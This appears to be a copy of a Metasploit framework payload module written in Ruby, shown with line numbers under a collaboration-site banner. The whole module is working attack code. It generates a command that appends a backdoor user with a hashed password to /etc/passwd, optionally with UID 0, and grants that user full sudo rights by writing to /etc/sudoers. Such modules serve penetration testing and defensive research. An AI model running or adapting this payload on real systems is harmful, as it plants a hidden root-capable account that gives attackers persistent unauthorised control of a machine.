Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'unix_crypt'
7

8
module MetasploitModule
9
  CachedSize = :dynamic
10

11
  include Msf::Payload::Single
12
  include Msf::Sessions::CommandShellOptions
13

14
  def initialize(info = {})
15
    super(
16
      merge_info(
17
        info,
18
        'Name' => 'Add user with useradd',
19
        'Description' => %q{
20
          Creates a new user. By default the new user is set with sudo
21
          but other options exist to make the new user automatically
22
          root but this is not automatically set since the new user will
23
          be treated as root (and login may be difficult). The new user
24
          can also be set as just a standard user if desired.
25
        },
26
        'Author' => 'Nick Cottrell <Rad10Logic>',
27
        'License' => MSF_LICENSE,
28
        'Platform' => 'unix',
29
        'Arch' => ARCH_CMD,
30
        'Handler' => Msf::Handler::None,
31
        'Session' => Msf::Sessions::CommandShell,
32
        'PayloadType' => 'cmd',
33
        'RequiredCmd' => 'generic',
34
        'Payload' => {
35
          'Offsets' => {},
36
          'Payload' => ''
37
        }
38
      )
39
      )
40

41
    register_options(
42
      [
43
        OptString.new('USER', [ true, 'The username to create', 'metasploit' ]),
44
        OptString.new('PASS', [ true, 'The password for this user', 'Metasploit$1' ])
45
      ]
46
    )
47

48
    register_advanced_options(
49
      [
50
        OptEnum.new('RootMethod', [false, 'The method to obtain root with the new user', 'SUDO', ['SUID', 'SUDO', 'NONE']]),
51
        OptBool.new('CheckSudoers', [false, 'Check if the sudoers file exists before modifying it', true], conditions: %w[RootMethod == SUDO])
52
      ]
53
    )
54
  end
55

56
  #
57
  # Constructs the payload
58
  #
59
  def generate(_opts = {})
60
    vprint_good(command_string)
61
    return super + command_string
62
  end
63

64
  def user
65
    if datastore['USER'] !~ /^[a-z][-a-z0-9]*$/
66
      raise ArgumentError, 'Username doesn\'t fit within regex /[a-z][-a-z0-9]*/'
67
    end
68

69
    datastore['USER']
70
  end
71

72
  #
73
  # Returns the command string to use for execution
74
  #
75
  def command_string
76
    suid = if datastore['RootMethod'] == 'SUID'
77
             '0'
78
           else
79
             rand(1010..1999).to_s
80
           end
81
    passwd = UnixCrypt::MD5.build(datastore['PASS'], 'Az')
82
    payload_cmd = "echo \'#{user}:#{passwd}:#{suid}:#{suid}::/:/bin/sh\'>>/etc/passwd"
83
    if datastore['RootMethod'] == 'SUDO'
84
      if datastore['CheckSudoers']
85
        payload_cmd += ";[ -f /etc/sudoers ]&&(echo \'#{user} ALL=(ALL:ALL) ALL\'>>/etc/sudoers)"
86
      else
87
        payload_cmd += ";echo \'#{user} ALL=(ALL:ALL) ALL\'>>/etc/sudoers"
88
      end
89
    end
90
    payload_cmd
91
  end
92
end
93

94